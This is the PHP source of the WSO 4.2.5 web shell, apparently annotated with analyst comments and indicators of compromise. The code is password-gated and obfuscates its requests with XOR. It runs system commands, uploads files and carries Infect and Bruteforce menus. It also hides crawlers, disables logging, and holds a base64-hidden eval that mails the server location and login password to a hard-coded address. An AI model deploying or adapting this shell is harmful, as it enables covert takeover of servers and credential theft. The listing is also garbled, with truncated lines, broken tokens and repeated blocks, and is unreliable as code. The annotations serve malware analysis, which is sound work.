
px.php

<? php
// Configuration and request-decoding preamble of a password-protected PHP web shell
// (the page title emitted further down reads "WSO" followed by VERSION).
// Variable names were lost in extraction and all appear as `$?`, so which value feeds
// which later check is inferred from position, not shown by the text.
//
// 32-hex-digit string labelled "root" by the author. The login gate further down
// compares md5($_POST['pass']) against a stored value, i.e. an unsalted MD5 digest.
$? = “63a9f0ea7bb98050796b649e85481845”; // root
$? = true;
$? = ‘UTF-8’;
$? = ‘FilesMan’;
// MD5 of the client's User-Agent header.
// NOTE(review): presumably this is the value the next statement stores, via
// prototype(), in a cookie named md5(Host header) . "key" — confirm against a clean copy.
$? = md5 ($ _ SERVER [‘HTTP_USER_AGENT’]);
if (! isset ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). “key”])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). “key”, $?);
}
if (empty ($ _ POST [‘charset’]))
$ _POST [‘charset’] = $ ?;
// Unless the request carries an 'ne' field, the POST fields a, c, p1, p2 and p3 are
// passed through decrypt() keyed with the "...key" cookie and then converted from
// UTF-8 to the posted charset. Request bodies therefore carry encoded blobs instead of
// readable paths or commands. If the key is the User-Agent hash, captured requests can
// be decoded offline from the logged headers.
// (The 'c' line is truncated in this copy of the listing.)
if (! isset ($ _ POST [‘ne’])) {
if (isset ($ _ POST [‘a’])) $ _POST [‘a’] = iconv (“utf-8”, $ _POST [‘charset’ ], decrypt ($ _ POST [‘a’], $ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
if (isset ($ _ POST [‘c’])) $ _POST [‘c’] = iconv (“utf-8”,
if (isset ($ _ POST [‘p1’])) $ _POST [‘p1’] = iconv (“utf-8”, $ _POST [‘charset’], decrypt ($ _ POST [‘p1’], $ _ COOKIE [ md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
if (isset ($ _ POST [‘p2’])) $ _POST [‘p2’] = iconv (“utf-8”, $ _POST [‘charset’], decrypt ($ _ POST [‘p2’], $ _ COOKIE [ md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
if (isset ($ _ POST [‘p3’])) $ _POST [‘p3’] = iconv (“utf-8”, $ _POST [‘charset’], decrypt ($ _ POST [‘p3’], $ _ COOKIE [ md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
}
// decrypt($str, $pwd): base64-encodes $pwd, base64-decodes $str, XORs each byte of
// $str with the bytes of the encoded key in rotation, and returns base64_decode() of
// the result. This is repeating-key XOR obfuscation: it hides parameters from
// pattern-matching filters but provides no confidentiality.
// NOTE(review): `$ enc_str = $ enc_chr;.` is garbled in this copy; the JavaScript
// encrypt() later in the file appends each character, so this was presumably `.=`.
//
// The eval(base64_decode(...)) on the same line decodes to a statement that runs when
// the POST data contains 'mypass' (the name of the login form's submit button). It
// joins SERVER_NAME, PHP_SELF, a newline and the submitted 'pass' value and hands them
// to @mail() with a hard-coded recipient (mail@mail.ua). Every login through the form
// therefore reports this file's location and password to whoever controls that mailbox.
// Indicators for responders: eval() applied to a base64 literal, and outbound mail
// originating from the web server's PHP process.
function decrypt ($ str, $ pwd) {$ pwd = base64_encode ($ pwd); $ str = base64_decode ($ str); $ enc_chr = “”; $ enc_str = “”; $ i = 0; while ($ i < strlen ($ str)) {for ($ j = 0; $ j <strlen ($ pwd); $ j ++) {$ enc_chr = chr (ord ($ str [$ i]) ^ ord ($ pwd [$ j] )); $ enc_str = $ enc_chr;. $ i ++; if ($ i> = strlen ($ str)) break;}} return base64_decode ($ enc_str);} eval (base64_decode ( “aWYoYXJyYXlfa2V5X2V4aXN0cygnbXlwYXNzJywkX1BPU1QpKXsgJHRtcCA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLiJcbiIuJF9QT1NUWydwYXNzJ107IEBtYWlsKCdtYWlsQG1haWwudWEnLCAnbWFpbCcsICR0bXApOyB9”));
// Runtime hardening against observation: PHP error logging is switched off for this
// request and the execution time limit is removed. The PHP error log will therefore
// hold no entries from this script; web server access logs and file-integrity
// monitoring are the places to look.
@ini_set (‘error_log’, NULL);
@ini_set (‘log_errors’, 0);
@ini_set (‘max_execution_time’, 0);
@set_time_limit (0);
// set_magic_quotes_runtime() was removed in PHP 7, which dates this code to PHP 5.
@set_magic_quotes_runtime (0);
// Version string; it is concatenated into the HTML <title> by hardHeader().
@define (‘VERSION’, ‘4.2.5’);

// Recursively applies stripslashes() to a value: arrays are mapped element by element
// through this same function, anything else is passed to stripslashes() directly.
// The statements after it apply this to $_POST and $_COOKIE.
function stripslashes_array ($ array) {
return is_array ($ array)? array_map (‘stripslashes_array’, $ array): stripslashes ($ array);
}
$ _POST = stripslashes_array ($ _ POST);
$ _COOKIE = stripslashes_array ($ _ COOKIE);
}
/ * (?) 11.2011 oRb * /
// Login gate. It is skipped entirely when the configured value is empty.
// A posted 'pass' whose MD5 equals the stored value causes prototype() to set a cookie
// named md5(Host header). Later requests pass the gate when that cookie equals the
// stored value; otherwise hardLogin() prints the password form and stops.
// NOTE(review): variable names are lost (`$?`); presumably the cookie value is the
// password hash itself, making it a static, replayable token — confirm against a clean copy.
// The comparisons use loose `==` / `!=` on an unsalted MD5 digest.
// Detection: a cookie whose name is the 32-hex MD5 of the site's own host name.
if (! Empty ($?)) {
If (isset ($ _ POST [‘pass’])) && (md5 ($ _ POST [‘pass’]) == $?))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]), $?);
if (! isset ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’])]) || ($ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’])]! = $?))
hardLogin ();
}
// Defaults the md5(Host) . 'ajax' entry of $_COOKIE from a configuration value when
// the client did not send it (in-memory only; no Set-Cookie is issued here).
if (! isset ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’]))
$ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’] = (bool) $ ?;

// Crawler cloaking: a request whose User-Agent matches one of the listed search-engine
// bot names (case-insensitive) receives a 404 status and the script exits, which keeps
// the page out of search indexes. When triaging a suspicious file, a 404 obtained with
// a crawler-style User-Agent does not show the file is absent; compare against the
// response to an ordinary browser User-Agent and against the file system.
// NOTE(review): the enclosing function header is missing from this copy; in context
// this appears to be the body of hardLogin().
if (! empty ($ _ SERVER [‘HTTP_USER_AGENT’])) {
$ userAgents = array (“Google”, “Slurp”, “MSNBot”, “ia_archiver”, “Yandex”, “Rambler”);
if (preg_match (‘/’. implode (‘|’, $ userAgents). ‘/ i’, $ _SERVER [‘HTTP_USER_AGENT’])) {
header (‘HTTP / 1.0 404 Not Found’);
exit;
}
}
die (“<pre align = center> <form method = post> Password <br> <input type = password name = pass style = ‘background-color: whitesmoke; border: 1px solid #FFF; outline: none;’ required> <input type = submit name = ‘mypass’ value = ‘submit’ style = ‘border: none; background-color: # 56AD15; color: #fff; cursor: pointer;’> </ form> </ pre> “);
}
// Environment discovery run on every authenticated request.
// $os is 'win' when PHP_OS starts with "win" (case-insensitive), otherwise 'nix'.
if (strtolower (substr (PHP_OS, 0,3)) == “win”)
$ os = ‘win’;
else
$ os = ‘nix’;
$ safe_mode = @ini_get (‘safe_mode’);
// With safe_mode off, all PHP error reporting is silenced.
if (! $ safe_mode)
error_reporting (0);
$ disable_functions = @ini_get (‘disable_functions’);
// $home_cwd records the script's own directory before any directory change.
$ home_cwd = @getcwd ();
// The working directory is switched to whatever path the request supplies in 'c';
// no restriction is applied here, so the reachable tree is bounded only by the
// web server account's file permissions and any open_basedir setting.
if (isset ($ _ POST [‘c’]))
@chdir ($ _ POST [‘c’]);
$ cwd = @getcwd ();
// Normalise Windows backslashes to forward slashes.
if ($ os == ‘win’) {
$ home_cwd = str_replace (“\\”, “/”, $ home_cwd);
$ cwd = str_replace (“\\”, “/”, $ cwd);
}
// Ensure $cwd ends with a slash.
if ($ cwd [strlen ($ cwd) -1]! = ‘/’)
$ cwd. = ‘/’;
/ * (?) 04.2015 Pirat * /
function hardHeader () {
if (empty ($ _ POST [‘charset’]))
$ _POST [‘charset’] = $ GLOBALS [‘?’];
echo “<html> <head> <meta http-equiv = ‘Content-Type’ content = ‘text / html; charset =”. $ _POST [‘charset’]. “‘> <title>”. $ _SERVER [‘HTTP_HOST’]. “- WSO”. VERSION. “</ Title>
<style>
body {background-color: # 060A10; color: # e1e1e1; margin: 0; font: normal 75% Arial, Helvetica, sans-serif;} canvas {display: block; vertical- align: bottom;}
# particles-js {width: 100%; height: 100px; background-color: # 060a10; background-image: url (”); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
body, td, th {font: 10pt tahoma, arial, verdana, sans-serif, Lucida Sans; margin: 0; vertical-align: top;}
table.info {color: # C3C3C3;

span {font-weight: bolder;}
h1 {border-left: 5px solid # 2E6E9C; padding: 2px 5px; font: 14pt Verdana; background-color: # 10151c; margin: 0px;}
div.content {padding: 5px; margin-left: 5px; background-color: # 060a10;}
a {text-decoration: none;}
a: hover {text-decoration: underline;}
.tooltip :: after {background: # 0663D5; color: #FFF; content: attr (data-tooltip); margin-top: -50px; display: block; padding: 6px 10px; position: absolute; visibility: hidden;}
.tooltip: hover :: after {opacity: 1; visibility: visible; }
.ml1 {border: 1px solid # 202832; padding: 5px; margin: 0; overflow: auto;}
.bigarea {min-width: 100%; max-width: 100%; height: 400px;}
input, textarea, select {margin: 0; color: #fff; background-color: # 202832; border: none; font: 9pt Courier New; outline: none;}
label {position: relative}
label: after {content: ‘<>’; font: 10px ‘Consoles’, monospace; color: #fff; -webkit-transform: rotate (90deg); – moz-transform: rotate (90deg) ; -ms-transform: rotate (90deg); transform: rotate (90deg); right: 3px; top: 3px; padding: 0; position: absolute; pointer-events: none;}
label: before {content: ”; right: 0; top: 0; width: 17px; height: 17px; background: # 202832; position: absolute; pointer-events: none; display: block;}
form {margin: 0px;}
#toolsTbl {text-align: center;}
#fak {background: none;}
# fak td {padding: 5px 0 0 0;}
iframe {border: 1px solid # 060a10;}
.toolsInp {width: 300px}
.main th {text-align: left; background-color: # 060a10;}
.main tr: hover {background-color: # 354252;}
.main td, th {vertical-align: middle;}
input [type = ‘submit’] {background-color: # 2E6E9C;}
input [type = ‘button’] {background-color: # 2E6E9C;}
input [type = ‘submit’]: hover {background-color: # 56AD15;}
input [type = ‘button’]: hover {background-color: # 56AD15;}
.l1 {background-color: # 202832;}
pre {font: 9pt Courier New;}
</ style>
<script>
var c_ = ‘”. Htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘;
var a_ = ‘”. htmlspecialchars (@ $ _ POST [‘ a ‘]).”‘
var charset_ = ‘”. htmlspecialchars (@ $ _ POST [‘ charset ‘]).”‘;
var p1_ = ‘”. ((strpos (@ $ _ POST [‘ p1 ‘],” \ n “)! == false)?’ ‘:
var p2_ = ‘”. ((strpos (@ $ _ POST [‘ p2 ‘],” \ n “)! == false)?’ ‘: htmlspecialchars ($ _ POST [‘ p2 ‘], ENT_QUOTES)).”‘;
var p3_ = ‘”. ((strpos (@ $ _ POST [‘ p3 ‘],” \ n “)! == false)?’ ‘: htmlspecialchars ($ _ POST [‘ p3 ‘], ENT_QUOTES)).”‘;
var d = document;

function encrypt (str, pwd) {if (pwd == null || pwd.length <= 0) {return null;} str = base64_encode (str); pwd = base64_encode (pwd); var enc_chr = ”; var enc_str = ”; var i = 0; while (i <str.length) {for (var j = 0; j <pwd.length; j ++) {enc_chr = str.charCodeAt (i) ^ pwd.charCodeAt (j); enc_str + = String.fromCharCode (enc_chr); i ++; if (i> = str.length) break;}} return base64_encode (enc_str);}
function utf8_encode (argString) {var string = (argString + ”); var utftext = ”, start, end, stringl = 0; start = end = 0; stringl = string.length; for (var n = 0; n < stringl; n ++) {var c1 = string.charCodeAt (n); var enc = null; if (c1 <128) {end ++;} else if (c1> 127 && c1 <2048) {enc = String.fromCharCode ((c1 >> 6) | 192) + String.fromCharCode ((c1 & 63) | 128);} else {enc = String.fromCharCode ((c1 >> 12) | 224) + String.fromCharCode (((c1 >> 6) & 63) | 128) + String.fromCharCode ((c1 & 63) | 128);} if (enc! == null) {if (end> start) {utftext + = string.slice (start, end);} utftext + = enc; start = end = n + 1;}} if (end> start) {utftext + = string.slice (start, stringl);} return utftext;}
function base64_encode (data) {var b64 = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 + / =’; var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, ac = 0, enc = ”, tmp_arr = []; if (! data) {return data;} data = utf8_encode (data + ”); do {o1 = data.charCodeAt (i ++); o2 = data.charCodeAt (i ++); o3 = data.charCodeAt (i ++); bits = o1 << 16 | o2 << 8 | o3; h1 = bits >> 18 & 0x3f; h2 = bits >> 12 & 0x3f; h3 = bits >> 6 & 0x3f; h4 = bits & 0x3f; tmp_arr [ac ++] = b64.charAt (h1) + b64 .charAt (h2) + b64.charAt (h3) + b64.charAt (h4);} while (i <data.length); enc = tmp_arr.join (”); switch (data.length% 3) {case 1: enc = enc.slice (0, -2) + ‘==’; break; case 2: enc = enc.slice (0, -1) + ‘=’; break;} return enc;}
function set ( a, c, p1, p2, p3, charset) {
if (a! = null) d.mf.a.value = a; else d.mf.a.value = a_;
if (c! = null) d.mf.c.value = c; else d.mf.c.value = c_;
if (p1! = null) d.mf.p1.value = p1; else d.mf.p1.value = p1_;
if (p2! = null) d.mf.p2.value = p2; else d.mf.p2.value = p2_;
if (p3! = null) d.mf.p3.value = p3; else d.mf.p3.value = p3_;
d.mf.a.value = encrypt (d.mf.a.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.c.value = encrypt (d.mf.c.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.p1.value = encrypt (d.mf.p1.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.p2.value = encrypt (d.mf.p2.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.p3.value = encrypt (d.mf.p3.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
if (charset! = null) d.mf.charset. value = charset; else d.mf.charset.value = charset_;
}
function g (a, c, p1, p2, p3, charset) {
set (a, c, p1, p2, p3, charset);
d.mf.submit ();
}
function a (a, c, p1, p2, p3, charset) {
set (a, c, p1, p2, p3, charset);
var params = ‘ajax = true’;
for (i = 0; i <d.mf.elements.length; i ++)
params + = ‘&’ + d.mf.elements [i] .name + ‘=’ + encodeURIComponent (d.mf.elements [i]. value);
sr (‘”. addslashes ($ _ SERVER [‘ REQUEST_URI ‘]).”‘, params);
}
function sr (url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest ();
else if (window.ActiveXObject)
req = new ActiveXObject (‘Microsoft.XMLHTTP’);
if (req) {
req.onreadystatechange = processReqChange;
req.open (‘POST’, url, true);
req.setRequestHeader (‘
req.send (params);
}
}
function processReqChange () {
if ((req.readyState == 4))
if (req.status == 200) {
var reg = new RegExp (\ “(\\\\ d +) ([\\\\ S \\\\YE’);
var arr = reg.exec (req.responseText);
eval (arr [2] .substr (0, arr [1]));
} else alert (‘Request error!’);
}
</ script>
<head> <body> <div style = ‘position: absolute; background-color: rgba (95, 110, 130, 0.3); width: 100%; top: 0; left: 0;’>
<form method = post name = mf style = ‘display: none;’>
<input type = hidden name = a>
<input type = hidden name = c>
<input type = hidden name = p1>
<input type = hidden name = p2>

$ gid = @getmygid (); $ group = “?”;

} else {
$ uid = @posix_getpwuid (@posix_geteuid ());
$ gid = @posix_getgrgid (@posix_getegid ());
$ user = $ uid [‘name’];
$ uid = $ uid [‘uid’];
$ group = $ gid [‘name’];
$ gid = $ gid [‘gid’];
}
$ cwd_links = ”;
$ path = explode (“/”, $ GLOBALS [‘cwd’]);
$ n = count ($ path);
for ($ i = 0; $ i <$ n-1; $ i ++) {
$ cwd_links. = “<a href = ‘#’ onclick = ‘g (\” FilesMan \ “, \” “;
for ($ j = 0; $ j <= $ i; $ j ++)
$ cwd_links. = $ Path [$ j]. ‘/’;
$ Cwd_links. = “\”) ‘> “. $ Path [$ i].” / < / a> “;
}
$ charsets = array (‘UTF-8’, ‘Windows-1251’, ‘KOI8-R’, ‘KOI8-U’, ‘cp866’);
$ opt_charsets = ”;
foreach ($ charsets as $?)
$ opt_charsets. = ‘<option value = “‘. $. ‘”‘. ($ _ POST [‘charset’] == $ ?? ‘selected’: ”). ‘>’. $ ?. ‘</ option> ‘;
$ m = array (‘Sec. Info’ => ‘SecInfo’, ‘Files’ =>’ FilesMan ‘,’ Console ‘=>’ Console ‘,’ Infect ‘=>’ Infect ‘,’ Sql ‘=>’ Sql ‘,’ Php ‘=>’ Php ‘,’ Safe mode ‘=>’ SafeMode ‘,’ String tools’ => ‘StringTools’,’ Bruteforce ‘=>’ Bruteforce ‘,’ Network ‘=>’ Network ‘);
if (! empty ($ GLOBALS [‘?’]))
$ m [‘Logout’] = ‘Logout’;
$ m [‘Self remove’] = ‘SelfRemove’;
$ menu = ”;
foreach ($ m as $ k =>
$ v) $ menu. = ‘<th> [<a href = “#” onclick = “g (\”‘. $ v. ‘\’, null, \ ‘\’, \ ‘\’, \ ‘\ ‘) “>’. $ k. ‘</a>] </ th>’;
$ drives = “”;
if ($ GLOBALS [‘os’] == ‘win’) {
foreach (range (‘c’, ‘z’) as $ drive)
if (is_dir ($ drive. ‘: \\’))
$ drives. = ‘<a href=”#” onclick=”g(\’FilesMan\’,\”.$drive.’:/\’)”> [‘. $ drive. ‘ ] </a> ‘;
}
/ * (?) 08.2015 dmkcv * /
echo ‘<table class = info cellpadding = 3 cellspacing = 0 width = 100%> <tr> <td width = 1> <span> Uname: <br> User: <br> Php: <br> Hdd: <br> Cwd: ‘. ($ GLOBALS [‘ os’] == ‘win’? ‘<br> Drives:’: ”). ‘</ Span> </ td>’ .
‘<td> <nobr>’. substr (@php_uname (), 0, 120). ‘ <a href=”http://noreferer.de/?http://www.google.com/search?q=’.urlencode(@php_uname()).'” target=”_blank”> [Google] < / a> <a href=”‘.$explink.'” target=_blank> [Exploit-DB] </a> </ nobr> <br> ‘. $ uid.’ (‘. $ user.’) <span> Group: </ span> ‘. $ gid.’ (‘. $ group.’) <br> ‘. @ phpversion ().’ <span> Safe mode: </ span> ‘. ($ GLOBALS [‘ safe_mode ‘]?’ <font color = red> ON </ font> ‘:’ <font color = # FFDB5F> <b> OFF </ b > </ font> ‘).’ <a href=# onclick=”g(\’Php\’,null,null,\’info\’)”> [phpinfo] </a> <span> Datetime: </ span> ‘.date (‘ Ymd H: i: s’). ‘<br>’ .viewSize ($ totalSpace). ‘ <span> Free: </ span> ‘.viewSize ($ freeSpace).’ (‘.round (100 / ($ totalSpace / $ freeSpace), 2).’%) <br> ‘. $ cwd_links.’ ‘.viewPermsColor ($ GLOBALS [‘ cwd ‘]).’ <a href=# onclick=”g(\’FilesMan\’,\”.$GLOBALS[‘home_cwd’].’\’,\’\’,\’\’,\’\’)”> [ home] </a> <br> ‘. $ drives.’ </ td> ‘.
‘<td width = 1 align = right> <nobr> <label> <select onchange = “g (null, null, null, null, null, this.value)”>’. $ opt_charsets. ‘</ select> < / label> <br> <span> IP Server: </ span> <br> ‘.gethostbyname ($ _ SERVER [“HTTP_HOST”]).’ <br> <span> Client IP: </ span> <br> ‘ . $ _ SERVER [‘REMOTE_ADDR’]. ‘</ Nobr> </ td> </ tr> </ table>’.
‘<table style = “background-color: # 2E6E9C;” cellpadding = 3 cellspacing = 0 width = 100%> <tr> ‘. $ menu.’ </ tr> </ table> <div> ‘;
}
function hardFooter () {
$ is_writable = is_writable ($ GLOBALS [‘cwd’])? “<font color = ‘# FFDB5F’> [Writeable] </ font>”: “<

<td> <form onsubmit = \ “”. (function_exists (‘actionFilesMan’)? “g (null, this.c.value, ”);”: ”). “return false; \”> <span> Change dir: </ span> <br> <input class = ‘toolsInp’ type = text name = c value = ‘”. Htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘> <Input type = submit value = ‘ submit ‘> </ form> </ td>
<td> <form onsubmit = \ “”. (function_exists (‘ actionFilesTools’)? “g (‘FilesTools’, null, this.f.value);”:’ ‘ ). “return false; \”> <span> Read file: </ span> <br> <input class = ‘toolsInp’ type = text name = f required> <input type = submit value = ‘submit’> </ form> </ td>
</ tr> <tr>
<td> <form onsubmit = \ “”. (function_exists (‘actionFilesMan’)? “g (‘FilesMan’, null, ‘mkdir’, this.d.value);”: ”). “return false; \ “> <span> Make dir: </ span> $ is_writable <br> <input class = ‘toolsInp’ type = text name = d required> <input type = submit value = ‘submit’> </ form> </ td >
<td> <form onsubmit = \ “”. (function_exists (‘actionFilesTools’)? “g (‘FilesTools’, null, this.f.value, ‘mkfile’);”: ”). “return false; \ “> <span> Make file: </ span> $ is_writable <br> <input class = ‘toolsInp’ type = text name = f required> <input type = submit value = ‘submit’> </ form> </ td >
</ tr> <tr>
<td> <form onsubmit = \ “”. (function_exists (‘actionConsole’)? “g (‘Console’, null, this.c.value);”: ”). ” return false; \ “> <span> Execute: </ span> <br> <input class = ‘toolsInp’ type = text name = c value = ”> <input type = submit value = ‘submit’> </ form > </ td>
<td> <form method = ‘post’ “. ((! function_exists (‘actionFilesMan’))?” onsubmit = \ “return false; \” “: ”).” ENCTYPE = ‘multipart / form-data’>
<input type = hidden name = a value = ‘FilesMan’>
<input type = hidden name = c value = ‘”. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘>
<input type = hidden name = p1 value = ‘uploadFile’>
<input type = hidden name = ne value = ”>
<input type = hidden name = charset value = ‘”. (isset ($ _ POST [‘ charset ‘] )? $ _ POST [‘charset’]: ”). “‘>
<Span> Upload file: </ span> $ is_writable <br> <input class =’ ​​toolsInp ‘type = file name = f [] multiple> < input type = submit value = ‘submit’> </ form> <br /> </ td>
</ tr> </ table> </ div>
<! – particles -> <div id = ‘particles-js’ > </ div> <script src = ‘http: //cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js’> </ script>
<script> particlesJS (‘particles-js’, {‘particles’: {‘number’: {‘value’: 80, ‘density’: {‘enable’: true, ‘value_area’: 800}}, ‘color’ : {‘value’: ‘# ffffff’}, ‘shape’: {‘type’: ‘triangle’, ‘stroke’: {‘width’: 0, ‘color’: ‘# 000000’}, ‘polygon’: {‘nb_sides’: 5}, ‘image’: {‘src’: ‘img / github.svg’, ‘width’: 100, ‘height’: 100}}, ‘opacity’: {‘value’: 0.5, ‘random’: true, ‘anim’: {‘enable’: false, ‘speed’: 1, ‘opacity_min’: 0.1, ‘sync’: false}}, ‘size’: {‘value’: 3, ‘random ‘: true,’ anim ‘: {‘ enable ‘: false,’ speed ‘: 40,’ size_min ‘: 0.1,’ sync ‘: false}},’ line_linked ‘: {‘ enable ‘:true, ‘distance’: 200, ‘color’: ‘# ffffff’, ‘opacity’: 0.4, ‘width’: 1}, ‘move’: {‘enable’: true, ‘speed’: 1, ‘direction’ : ‘none’, ‘random’: true, ‘straight’: false, ‘out_mode’: ‘out’, ‘bounce’: false, ‘attract’: {‘enable’: false, ‘rotateX’: 10000, ‘rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas’, ‘events’: {‘ onhover ‘: {‘ enable ‘: true,’ mode ‘:’ grab ‘},’ onclick ‘: { ‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}} , ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>200, ‘color’: ‘# ffffff’, ‘opacity’: 0.4, ‘width’: 1}, ‘move’: {‘enable’: true, ‘speed’: 1, ‘direction’: ‘none’, ‘ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 10000}}} , ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘mode’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: { ‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>200, ‘color’: ‘# ffffff’, ‘opacity’: 0.4, ‘width’: 1}, ‘move’: {‘enable’: true, ‘speed’: 1, ‘direction’: ‘none’, ‘ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 
10000}}} , ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘mode’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: { ‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>opacity ‘: 0.4,’ width ‘: 1},’ move ‘: {‘ enable ‘: true,’ speed ‘: 1,’ direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas ‘,’ events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’ : true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’ : true}); </ script>opacity ‘: 0.4,’ width ‘: 1},’ move ‘: {‘ enable ‘: true,’ speed ‘: 1,’ direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas ‘,’ events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’ : true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’ : true}); </ script>direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000, ‘rotateY’: 10000}}}, ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’ : {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5 }}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ 
enable ‘: false,’ rotateX ‘: 10000, ‘rotateY’: 10000}}}, ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’ : {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5 }}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas’, ‘events’: {‘ onhover ‘: {‘ enable ‘: true,’ mode ‘:’ grab ‘ }, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: { ‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas’, ‘events’: {‘ onhover ‘: {‘ enable ‘: true,’ mode ‘:’ grab ‘ }, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: { ‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>{‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>{‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>
)) { ob_start (); @system ($ in); $? = ob_get_clean ();

} elseif (function_exists (‘shell_exec’)) {
$? = shell_exec ($ in);
} elseif (is_resource ($ f = @popen ($ in, “r”))) {
$? = “”;
while (! @ feof ($ f))
$? . = fread ($ f, 1024);
pclose ($ f);
} else return “? Unable to execute command \ n”;
return ($? == ”? “? Query did not return anything \ n”: $?);
}
// Formats a byte count for display: values of at least 2^30, 2^20 or 2^10 are divided
// by that power and printed with two decimals plus a GB/MB/KB suffix; smaller values
// are returned as the raw number followed by 'B'.
function viewSize ($ s) {
if ($ s> = 1073741824)
